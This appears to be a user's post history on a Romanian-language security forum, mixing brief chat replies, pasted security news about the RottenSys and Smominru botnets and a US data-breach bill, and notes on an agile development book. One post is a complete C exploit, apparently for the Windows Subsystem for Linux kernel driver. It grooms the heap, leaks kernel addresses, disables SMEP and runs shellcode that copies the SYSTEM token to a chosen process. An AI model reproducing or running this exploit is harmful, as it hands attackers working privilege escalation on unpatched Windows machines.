Jump to content

iulik

Active Members
  • Posts

    702
  • Joined

  • Last visited

  • Days Won

    18

Everything posted by iulik

  1. Lasa-mi site-ul pe pm daca vrei si pot sa arunc o privire .
  2. iulik

    1.1.1.1

    Eu deja am schimbat
  3. Recomand Nathan for You
  4. Vrei ca medicamentele sa te ajute cu informatii?
  5. iulik

    ..

    Cu boala te mai lupti, da cu prostia...
  6. Security researchers have discovered a massive continuously growing malware campaign that has already infected nearly 5 million mobile devices worldwide. Dubbed RottenSys, the malware that disguised as a 'System Wi-Fi service' app came pre-installed on millions of brand new smartphones manufactured by Honor, Huawei, Xiaomi, OPPO, Vivo, Samsung and GIONEE—added somewhere along the supply chain. All these affected devices were shipped through Tian Pai, a Hangzhou-based mobile phone distributor, but researchers are not sure if the company has direct involvement in this campaign. https://thehackernews.com/2018/03/android-botnet-malware.html
      • 1
      • Upvote
  7. I-ai intrebat pe cei de la facebook ce s-a intamplat?
  8. Eu zic ca s-a suparat y pe x, y a aflat datele lui x si a vrea sa se razbune. "Un hacker a hackerit alt hacker" Reckon 2012
  9. Nu aveau mai multi oameni
  10. Pe langa ca e foarte vechi postul, nu recomand la nimeni adnow, mi-am luat o teapa maricica de la ei
  11. https://thenextweb.com/hardfork/2018/03/07/binance-accidentally-selling-users-cryptocurrency-bitcoin/ @Shocker
  12. Nu te lasa sa il descarci
  13. Sa nu uitam si de: Un tutorial foarte bun pentru oricine, poate ar merge facut si un shortcut in Tutoriale in romana si pus sticky, daca e posibil asa ceva pe ipb .
  14. @dorianpro, @Ossian Nu a fost cu rautate, eram pur si simplu curios, am crezut ca esti Roman si ca ai crescut in alta parte . P.S: Welcome .
  15. Romana nu stii?
  16. Bafta
  17. De ce ai mai facut topicul atunci?
  18. Two U.S. senators recently proposed a cybersecurity legislation that will allow the Federal Trade Commission (FTC) to penalize credit rating industry organizations that don’t properly safeguard data. Cybersecurity Legislation Imposes Penalties for Breaches In a public statement outlining the proposed Data Breach Prevention and Compensation Act, Sens. Elizabeth Warren (D-Mass.) and Mark Warner (D-Va.) explained that the bill would create a new office at the FTC focused on information protection. If passed, it would enact strict penalties for breaches in customer data. Specifically, credit rating agencies would receive $100 fines for each piece of personally identifiable information (PII) lost in a data breach, plus $50 for each additional PII file per customer. According to SecurityWeek, the bill also requires agencies that fail to comply to pay a maximum penalty of 50 percent their gross revenue from the year before the incident took place. In addition to giving the FTC greater oversight and power over data protection practices, this cybersecurity legislation actually hits harder in terms of fines than the EU’s General Data Protection Regulation (GDPR). While many firms are bracing for GDPR to come into effect later this year, it’s clear that recent security headlines are creating just as much concern among lawmakers on this side of the Atlantic. Protecting Consumer Data The bill aims to ensure that consumers, whose personal information becomes the ultimate casualty when cybercriminals break into large corporate systems, will be fairly compensated: 50 percent of the fines collected by the FTC would go to the victims. The other half would go toward security research and inspections, SecurityWeek noted, ensuring that the law would also reduce the risk of similar occurrences in the future. It’s not unusual for modern governments to consider cybersecurity legislation. Just as credit agencies keep a close eye on how consumers spend their money, the government wants to keep an even closer eye on how these firms are keeping data from prying eyes. https://securityintelligence.com/news/new-cybersecurity-legislation-to-penalize-companies-for-data-breaches/
      • 1
      • Upvote
  19. “Old source code from three years ago appears to have been leaked, but by design the security of our products doesn’t depend on the secrecy of our source code. There are many layers of hardware and software protections built into our products, and we always encourage customers to update to the newest software releases to benefit from the latest protections.”
  20. da
  21. Today, I started reading The Pragmatic Programmers - "Practices of an Agile Developer" (ISBN 0-9745140-8-X) by Venkat Subramaniam and Andy Hunt because I wanted to learn more about agile development. This blog entry will track and document what I learn by reading this book in the hopes that you will be able to learn as well. However, I would encourage you to read the book for yourself. Definition – "Agile development uses feedback to make constant adjustments in a highly collaborative environment." Chapter 1 – Agile Software Development The Agile Manifesto (agilemanifesto.org) Individuals and interactions over processes and tools Working software over comprehensive documentation Customer collaboration over contract negotiation Responding to change over following a plan The Spirit of Agility Continuous development, not episodic Inject energy to resolve friction caused by episodic development Chapter 2 – Beginning Agility Professional Attitude – "A professional attitude focuses on positive outcomes for the project and the team, on personal and team growth, and on success." Quotable Quote – "one popular software methodology suggests you need to fulfill some thirty-five distinct roles on a project, ranging from architect to designer to coder to librarian. Agile methods take a different tack. You perform just one role: software developer. That is you. You do what is needed on the team, working closely with the customer to build software. Instead of relying on Gantt charts and stone tablets, agility relies on people." Practice #1 – Work for Outcome Blame does not fix bugs "Instead of pointing fingers, point to possible solutions. It is the positive outcome that counts." Practice #2 – Quick Fixes Become Quicksand Beware of land mines such as quick fixes and shallow hacks Do not code in isolation to ensure more than one person knows about a certain piece of the project Use unit tests "Do not fall for the quick hack. Invest the energy to keep code clean and out in the open." Practice #3 – Criticize Ideas, Not People Negativity kills innovation "Criticize ideas, not people. Take pride in arriving at a solution rather than providing whose idea is better." "There is no absolute best, only better. Despite the popularity of the term, there is no such thing as "best practices," only better practices in a particular situation." Practice #4 – Damn the Torpedoes, Go Ahead You definitely need to read this section for yourself - basically admit your mistakes and back up your opinions with facts (pros and cons). "Do what is right. Be honest, and have the courage to communicate the truth. It may be difficult at times; that is why it takes courage." Chapter 3 – Feeding Agility Practice #5 – Keep Up with Change Learn iteratively and incrementally Get the latest buzz Attend local user groups Attend workshops or conferences Read voraciously "Keep up with changing technology. You do not have to become an expert at everything, but stay aware of where the industry is headed, and plan your career and projects accordingly." Practice #6 – Invest in Your Team Training "Raise the bar for you and your team. Use brown-bag sessions to increase everyone's knowledge and skills and help bring people together. Get the team excited about technologies or techniques that will benefit your project." Practice #7 – Know When to Unlearn "One of the foundations of agility is coping with change. Given that change is so constant and pervasive, does it make any sense to keep applying the same techniques and tools you have always used?" Expensive mental models are not discarded lightly "Learn the new; unlearn the old. When learning a new technology, unlearn any old habits that might hold you back. After all, there is much more to a car than just a horseless carriage." Practice #8 – Question Until You Understand The best question to ask – Why ...? "Keep asking Why. Do not just accept what you are told at face value. Keep questioning until you understand the root of the issue." Practice #9 – Feel the Rhythm Agile projects have rhythms and cycles Scrum protects the team from requirement changes during a development sprint Time boxing – setting a near-term, hard deadline for an activity that cannot be extended "Tackle tasks before they bunch up. It's easier to tackle common recurring tasks when you maintain steady, repeatable intervals between events." Chapter 4 – Delivering What Users Want Quotable Quote – "In warfare, as in software development, the situation can change quickly and drastically. Sticking to yesterday's plan despite a change in circumstances is a recipe for disaster." Practice #10 – Let Customer's Make Decisions Decide what you should not decide "You do not want to have to make decisions that are business critical by yourself. After all, it is not your business." "Let your customers decide. Developers, managers, or business analysts should not make business-critical decisions. Present details to business owners in a language they can understand, and let them make the decision." Practice #11 – Let Design Guide, Not Dictate Design should be only as detailed as needed to implement Strategic versus tactical design – strategic is the up-front design before requirements are known "A good design is a map; let it evolve. Design points you in the right direction. It is not the territory itself; it should not dictate the specific route. Do not let the design (or the designer) hold you hostage." "'No Big Design Up Front' does not mean no design. It just means do not get stuck in a design task without validating it with real code. Diving into code with no idea of a design is just as dangerous. Diving into code is fine for learning or prototyping, as long as you throw the code away afterward." "White boards, sketches, and Post-It notes are excellent design tools. Complicated modeling tools have a tendency to be more distracting than illuminating." Practice #12 – Justify Technology Use Blindly picking a framework is like having kids to save taxes Pick technology and frameworks based on statements like – "It is too hard to ..." or "It takes too long too ..." Does it really solve the problem? Will you be tied to this technology forever? When technology changes, will you be able to change the design to match technology? What about maintenance costs? Do not build what you can download – reinventing the wheel "Choose technology based on need. Determine your needs first, and then evaluate the use of technologies for those specific problems. Ask critical questions about the use of any technology, and answer them genuinely." Practice #13 – Keep It Releasable Checked-in code is always ready for action Check out the latest source. Run your local tests. Check in. "Keep your project releasable at all times. Ensure that the project is always compilable, runnable, tested, and ready to deploy at a moment's notice." Practice #14 – Integrate Early, Integrate Often Never accept big-bang integration "Integrate early, integrate often. Code integration is a major source of risk. To mitigate that risk, start integration early and continue to do it regularly." "Successful integration means that all the unit tests continue to pass. As per the Hippocratic oath – first, do no harm." "For prototypes and experimental code, you may want to work in isolation and not waste effort on integration. But do not stay isolated too long; once you learn from the experience, work toward integration quickly." Practice #15 – Automate Deployment Early QA should test deployment "Deploy your application automatically from the start. Use that deployment to install the application on arbitrary machines with different configurations to test dependencies. QA should test the deployment as well as your application." Practice #16 – Get Frequent Feedback Using Demos Requirements are as fluid as ink "Develop in plain sight. Keep your application in sight (and in the customer's mind) during development. Bring customers together and proactively seek their feedback using demos every week or two." Practice #17 – Use Short Iterations, Release in Increments Show me a detailed long-term plan, and I will show you a project that is doomed Definition (incremental development) – developing "application functionality in several small groups at a time. Each round of development builds on the functionality of the previous one and adds features that enhance the product's value. You can release or demo the product at that point." Definition (iterative development) – "carry out the various tasks of development - analysis, design, implementation, testing, and seeking feedback - in small, repetitive cycles, called iterations. The end of an iteration marks a milestone. However, the product may or may not be available at that time for real use." "Each increment generally includes many iterations." "Develop in increments. Release your product with minimal, yet usable, chunks of functionality. Within the development of each increment, use an iterative cycle of one to four weeks or so." Practice #18 – Fixed Prices Are Broken Promises "We have been talking all along about working in a continuous, iterative, and incremental fashion, and now someone comes along and wants to know ahead of time how long it will take and how much it will cost." A fixed price guarantees a broken promise "Estimate based on real work. Let the team actually work on the current project, with the current client, to get realistic estimates. Give the client control over their features and budget." Chapter 5 – Agile Feedback Practice #19 – Put Angels on Your Shoulder Coding feedback using unit tests Unit testing provides instant feedback Unit testing makes your code robust Unit testing can be a helpful design tool Unit testing is a confidence booster Unit tests can act as probes when solving problems Unit tests are reliable documentation Unit tests are a learning aid "Use automated unit tests. Good unit tests warn you about problems immediately. Do not make any design or code changes without solid unit tests in place." Practice #20 – Use It Before You Build It Write tests before writing code - test driven development "Adding gratuitous code is always a bad idea." "Use it before you build it. Use Test Driven Development as a design tool. It will lead you to a more pragmatic and simpler design." "Unit tests may not be appropriate when you are experimenting with an idea or prototyping. In the unfortunate case that the code does move forward into the real system, you will have to add the tests, but it is almost always better to start over from scratch." Practice #21 – Different Makes a Difference Automate to save time "Different makes a difference. Run unit tests on each supported platform and environment combination, using continuous integration tools. Actively find problems before they find you." Practice #22 – Automate Acceptance Testing "Create tests for core business logic. Have your customers verify these tests in isolation, and exercise them automatically as part of your general test runs." Practice #23 – Measure Real Progress Focus on where you are going "Measure how much work is left. Do not kid yourself - or your team - with irrelevant metrics. Measure the backlog of work to do." "If you are spending so much time keeping track of how much time you are spending that you are not spending enough time working on the project, then you are spending too much time keeping track of how much time you are spending. Get it?" Practice #24 – Listen to Users Users are the customer's employees - they are the ones using your software "Whether it is a bug in the product, a bug in the documentation, or a bug in our understanding of the user community, it is still the team's problem, not the user's." "Every complaint holds a truth. Find the truth, and fix the real problem." Chapter 6 – Agile Coding Practice #25 – Program Intently and Expressively "If someone hands you code that is easy to understand, they are making your life a lot easier. Honoring the Golden Rule, you owe it to them to make your own code easy to read." Program Intently and Expressively (PIE) principle "Write code to be clear, not clever. Express your intentions clearly to the reader of the code. Unreadable code is not clever." "There is no later. If you cannot do it right now, you will not be able to do it right later." Practice #26 – Communicate in Code Do not comment to cover up "Should you document all your code? To some extent, yes. But that does not mean you need comments for most of the code you write, especially within the body of you methods. Source code should be understandable not because it has comments but because of its elegance and clarity - proper use of variable names, good use of whitespace, good separation of logic, and concise expression." "Comment to communicate. Document code using well-chosen, meaningful names. Use comments to describe its purpose and constraints. Do not use commenting as a substitute for good code." "Commenting what the code does is not that useful; instead, comment why it does it." Further Readings http://www.martinfowler.com/articles/continuousIntegration.html http://www.martinfowler.com/articles/designDead.html
  22. Pai vrei sa te ajutam asa pe gratis? Vino cu ceva util pentru forum
  23. #define _GNU_SOURCE #include <errno.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/wait.h> #include <sys/types.h> #include <sys/mman.h> #include <unistd.h> #include <sys/ipc.h> #include <sys/sem.h> #include <sys/shm.h> #define RING_SIZE 0x2000000 #define PIPE_SIZE 0xb8 #define PTR_SIZE 0x8 #define STR_HDR_SIZE 0x18 #define LEAK_OFFSET 0x68 #define SHELLCODE_OFFSET 0x200 #define CHUNK_LVXF_OFFSET 0x138f4296 #define CR4_VAL_ADDR 0x506f8 #define MAGIC_KEY 0xefef #define NT_OFFSET_TO_PIVOT 0x288005 size_t curr_key = 0; char SHELLCODE[] = { //0xcc, 0x90, // CLI 0x90, // PUSHFQ 0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer 0x50, // PUSH RAX 0x51, // PUSH RCX 0x90, 0x90, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset] 0x90, 0x90, 0x90, // MOV QWORD PTR [RCX], RAX 0xb9, 0xfc, 0x11, 0x00, 0x00, // MOV ECX, PID 0x53, // PUSH RBX 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188 0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS 0x48, 0x8d, 0x80, 0xe8, 0x02, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset] //<tag> 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-8] // UniqueProcessID 0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4 0x75, 0xf3, // JNE <tag> 0x48, 0x8b, 0x58, 0x70, // MOV RBX, QWORD PTR [RAX+0x70] // GET TOKEN of SYSTEM 0x90, 0x90, 0x90, 0x53, // PUSH RBX //<tag2> 0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX] 0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-8] // UniqueProcessID 0x39, 0xcb, // CMP EBX, ECX // our PID 0x75, 0xf5, // JNE <tag2> 0x5b, // POP RBX 0x48, 0x89, 0x58, 0x70, // MOV QWORD PTR[RAX +0x70], RBX 0x90, 0x90, 0x90, 0x5b, // POP RBX 0x59, // POP RCX 0x58, // POP RAX 0x90, // POPFQ 0xc3 // RET }; int calc_stop_idx(size_t alloc_size, size_t factor); int get_size_factor(size_t spray_size, size_t *factor); int trigger_corruption(int spray_size); int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx); int spray(size_t count); int alloc_sem(size_t factor); int free_sem(int key); char *get_faked_shm(); void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid); void trigger_shm(size_t shmid); void print_shm(struct shmid_ds *buf); void *absolute_read(void* obj, size_t shmid, void *addr); int alloc_shm(size_t key); int shape(size_t *spray_size); int calc_stop_idx(size_t alloc_size, size_t factor) { size_t totalStringsLength, headersLength; totalStringsLength = (factor - 1) * 2 + 0xd001; headersLength = (factor * STR_HDR_SIZE) % (0x100000000); return (alloc_size + 496 + 0xc000) / STR_HDR_SIZE; } int get_size_factor(size_t spray_size, size_t *factor) { if (spray_size != 0x2000000) { printf("SPRAY_SIZE ISSUE\n"); exit(1); } *factor = 0xab13aff - 0x800*2; return 0x15fffdfc; } int trigger_corruption(int spray_size) { size_t factor = 0, alloc_size, stopIdx; int ret; alloc_size = get_size_factor(spray_size, &factor); if (alloc_size < 0) { printf("[*err*] unsupported spray_size == 0x%x", spray_size); return -1; } stopIdx = calc_stop_idx(alloc_size, factor); ret = call_LxpUtilReadUserStringSet(factor + 1, 1, 'O', stopIdx); printf("[*] trigger_corruption() returned 0x%x\n", ret); return 0; } int call_LxpUtilReadUserStringSet(size_t argc, size_t innerSize, char pattern, size_t stopIdx) { char **argv, *innerBuf, *stopInnerBuf = NULL; size_t pid; argv = (char*)mmap(NULL, argc * sizeof(char*), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if(!argv) { perror("[*err*] malloc argv failed\n"); return -1; } innerBuf = (char*)malloc(innerSize); if (!innerBuf) { printf("[*err*] malloc innerBuf failed\n"); return -1; } memset(innerBuf, pattern, innerSize); for(size_t i = 0; i < argc - 1; ++i) { argv[i] = innerBuf; } argv[argc-1] = NULL; pid = fork(); if (pid) { // parent if(stopIdx > 0) { sleep(1.5); printf("[*] set stopIdx, stopping wildcopy\n"); argv[stopIdx] = NULL; } return 0; } else { // son argv[stopIdx - 1] = (char*)malloc(0xe000); memset(argv[stopIdx - 1], "X", 0xd000-1); argv[stopIdx - 1][0xd000-1] = '\0'; argv[stopIdx - 7] = (char*)malloc(0xe000); memset(argv[stopIdx - 7], "X", 0xd000-1); argv[stopIdx - 7][0xd000-1] = '\0'; // this execve is on nonsense "program", so it will return err. // Just kill the thread. execve(argv[0], argv, NULL); exit(1); } } /* spray <count> chunks, and return number of total bytes allocated */ int spray(size_t count) { int exec[2]; int pipe_capacity = 0, ret = 0; for (size_t i = 0; i < count; ++i) { if (pipe(exec) < 0) { printf("[*err*] pipe\n"); ret = -1; goto cleanup; } pipe_capacity = fcntl(exec[1], F_SETPIPE_SZ, RING_SIZE); if(pipe_capacity < 0) { printf("[*err*] fcntl return neg capacity\n"); ret = -1; goto cleanup; } ret += pipe_capacity; } cleanup: return ret; } /* allocate 12 * v_nsems + 176 */ int alloc_sem(size_t factor) { int semid; int nsems = factor; semid = semget(curr_key++, nsems, IPC_CREAT | 0666); if(semid == -1) { printf("[*err*]semget failed, errno == 0x%x\n", errno); return -1; } return semid; } int free_sem(int key) { if(semctl(key, 0, IPC_RMID, 0) == -1) { printf("[*err*] semctl failed, errno == 0x%x\n", errno); return -1; } return 0; } char *get_faked_shm() { size_t shellcode_length = 0; char *obj = (char*)mmap(0xc000, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0x0); char *shellcode_ptr; if (obj == (void*)-1) { printf("[*err*] mmap failed\n"); return NULL; } char *cr4_addr = (char*)mmap(CR4_VAL_ADDR & ~0xfff, 0x10000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED | MAP_ANONYMOUS, -1, 0x0); if (cr4_addr == (void*)-1) { printf("[*err*] mmap failed\n"); return NULL; } memset(cr4_addr, 0x0, 0x10000); printf("[*] mmap userspace addr %p, set faked shm object\n", obj); obj += 0x1000; shellcode_ptr = obj + 0x200; initialize_fake_obj(obj, shellcode_ptr, NULL, 0x41414141, -1); return obj; } void initialize_fake_obj(char *obj, char *shellcode_ptr, char *read_addr, size_t fake_shmid, size_t pid) { size_t val = 0x4141414141414141, val2 = 7, val3 = CR4_VAL_ADDR; char *obj2 = obj+0x1000; memset(obj - 0x100, 0x0, 0x1000); memcpy(obj, &read_addr, sizeof(size_t)); memcpy((obj+0x10), &val, sizeof(size_t)); memcpy(obj - 0x20, &val2, sizeof(size_t)); memcpy(obj - 0x68, &obj, sizeof(char*)); memcpy(obj + 0x28, &shellcode_ptr, sizeof(char*)); memcpy(obj - 0x80, &obj, sizeof(char*)); memcpy((obj + 0x40), &val, sizeof(size_t)); memcpy(CR4_VAL_ADDR + 0x10, &fake_shmid, sizeof(size_t)); memcpy(CR4_VAL_ADDR - 0x20, &val2, sizeof(size_t)); memcpy(CR4_VAL_ADDR - 0x80, &val3, sizeof(char*)); memcpy(CR4_VAL_ADDR - 0x68, &val3, sizeof(char*)); memcpy(CR4_VAL_ADDR + 0x28, &shellcode_ptr, sizeof(char*)); memcpy((CR4_VAL_ADDR + 0x40), &val, sizeof(size_t)); memcpy(CR4_VAL_ADDR + 0x18, &val2, sizeof(size_t)); // refcount memcpy((CR4_VAL_ADDR + 0x50), &obj2, sizeof(size_t)); memcpy((CR4_VAL_ADDR + 0x90), &val3, sizeof(size_t)); memcpy(obj + SHELLCODE_OFFSET, SHELLCODE, sizeof(SHELLCODE)); memcpy(obj + SHELLCODE_OFFSET + 28, &pid, 4); } void trigger_shm(size_t shmid) { char *data; data = shmat(shmid, (void*)0, 0); } void print_shm(struct shmid_ds *buf) { printf ("\nThe USER ID = %p\n", buf->shm_perm.uid); printf ("The GROUP ID = %p\n", buf->shm_perm.gid); printf ("The creator's ID = %p\n", buf->shm_perm.cuid); printf ("The creator's group ID = %p\n", buf->shm_perm.cgid); printf ("The operation permissions = 0%o\n", buf->shm_perm.mode); printf ("The slot usage sequence\n"); //printf ("number = 0%x\n", buf->shm_perm.seq); //printf ("The key= 0%x\n", buf->shm_perm.key); printf ("The segment size = %p\n", buf->shm_segsz); printf ("The pid of last shmop = %p\n", buf->shm_lpid); printf ("The pid of creator = %p\n", buf->shm_cpid); printf ("The current # attached = %p\n", buf->shm_nattch); printf("The last shmat time = %p\n", buf->shm_atime); printf("The last shmdt time = %p\n", buf->shm_dtime); printf("The last change time = %p\n", buf->shm_ctime); } void *absolute_read(void* obj, size_t shmid, void *addr) { struct shmid_ds shm; initialize_fake_obj(obj, obj + SHELLCODE_OFFSET, addr, shmid, -1); shmctl(shmid, IPC_STAT, &shm); return (void*)shm.shm_ctime; } int alloc_shm(size_t key) { int shmid; shmid = shmget(key, 1024, 0644 | IPC_CREAT); return shmid; } int shape(size_t *spray_size) { size_t keys[0x400]; int exec[2]; int sv[2]; char flag; size_t bytes = 0, tofree = 0; size_t factor,hole_size; struct flock fl; memset(&fl, 0, sizeof(fl)); pid_t pid, wpid; int status; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1) { printf("[*err] socketpair failed\n"); return 1; } bytes = spray(1); if (bytes == (size_t)-1) { printf("[*err*] bytes < 0, are you root?\n"); return 1; } *spray_size = bytes; hole_size = get_size_factor(*spray_size, &factor); tofree = hole_size / (bytes / 1) + 1; printf("[*] allocate holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { keys[i] = alloc_sem(0x7000); } for (int i = 0; i < 0x20; ++i) { alloc_sem(0x7000); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(4063); } for (int i = 0; i < 0x2000; ++i) { alloc_sem(3); } pid = fork(); if (pid > 0) { printf("[*] alloc 0xc pages groups, adjust to continuous allocations\n"); bytes = spray(5); write(sv[1], "p", 1); read(sv[1], &flag, 1); } else { // son read(sv[0], &flag, 1); printf("[*] alloc workspace pages\n"); bytes = spray(tofree); printf("[*] finish allocate workspace allocations\n"); write(sv[0], "p", 1); } if (pid > 0) { printf("[*] allocating (0xc - shm | shm) AFTER the workspace\n"); for (int i = 0; i < 0x100; ++i) { alloc_sem(4061); for (int j = 0; j < 0x5; ++j) { alloc_shm(i * 0x100 + j); } } write(sv[1], "p", 1); } else { read(sv[0], &flag, 1); printf("[*] free middle allocation, creating workspace freed\n"); exit(1); } while ((wpid = wait(&status)) > 0); printf("[*] free prepared holes, create little pages holes before the workspace\n"); for (int i = 0; i < 0x400; ++i) { free_sem(keys[i]); } return 0; } int main(int argc, char **argv) { size_t spray_size = 0; char *obj; void *paged_pool_addr, *file_obj, *lxcore_addr, *nt_c_specific_handler; void *nt_addr; obj = get_faked_shm(); printf("[*] start shaping\n"); if (shape(&spray_size)) { printf("[*err*] shape failed, exit\n"); return 1; } // if there is some shm with shmid==0, delete it shmctl(0, IPC_RMID, NULL); printf("[*] shape is done\n"); if (trigger_corruption(spray_size) < 0) { printf("[*err*] internal error\n"); return 1; } sleep(8); printf("[*] leak shm, with the corrupted shmid\n"); paged_pool_addr = absolute_read(obj, 1, NULL); printf("[*] infoleak - PagedPool addr at %p\n", paged_pool_addr); file_obj = absolute_read(obj, 0xffff, paged_pool_addr + CHUNK_LVXF_OFFSET - LEAK_OFFSET); printf("[*] infoleak - fileObj addr at %p\n", file_obj); lxcore_addr = absolute_read(obj, 0, file_obj - 0x68 - LEAK_OFFSET); printf("[*] infoleak - lxcore!LxpSharedSectionFileType addr at %p\n", lxcore_addr); nt_c_specific_handler = absolute_read(obj, 0, lxcore_addr + 0x8b90 - LEAK_OFFSET); printf("[*] infoleak - nt!_C_specific_handler addr at %p\n", nt_c_specific_handler); printf("[*] call nt pivot, disable SMEP\n"); initialize_fake_obj(obj, nt_c_specific_handler + NT_OFFSET_TO_PIVOT, CR4_VAL_ADDR, MAGIC_KEY, -1); trigger_shm(MAGIC_KEY); sleep(5); printf("[*] jump to shellcode!\n"); initialize_fake_obj(obj, obj+0x200, CR4_VAL_ADDR, MAGIC_KEY, atoi(argv[1])); trigger_shm(MAGIC_KEY); sleep(2); return 0; }
      • 2
      • Upvote
  24. 2017 was the year of high profile data breaches and ransomware attacks, but from the beginning of this year, we are noticing a faster-paced shift in the cyber threat landscape, as cryptocurrency-related malware is becoming a popular and profitable choice of cyber criminals. Several cybersecurity firms are reporting of new cryptocurrency mining viruses that are being spread using EternalBlue—the same NSA exploit that was leaked by the hacking group Shadow Brokers and responsible for the devastating widespread ransomware threat WannaCry. Researchers from Proofpoint discovered a massive global botnet dubbed "Smominru," a.k.a Ismo, that is using EternalBlue SMB exploit (CVE-2017-0144) to infect Windows computers to secretly mine Monero cryptocurrency, worth millions of dollars, for its master. Active since at least May 2017, Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows, according to the researchers. "Based on the hash power associated with the Monero payment address for this operation, it appeared that this botnet was likely twice the size of Adylkuzz," the researchers said. The botnet operators have already mined approximately 8,900 Monero, valued at up to $3.6 million, at the rate of roughly 24 Monero per day ($8,500) by stealing computing resources of millions of systems. The highest number of Smominru infection has been observed in Russia, India, and Taiwan, the researchers said. https://thehackernews.com/2018/01/cryptocurrency-mining-malware.html
      • 1
      • Upvote
×
×
  • Create New...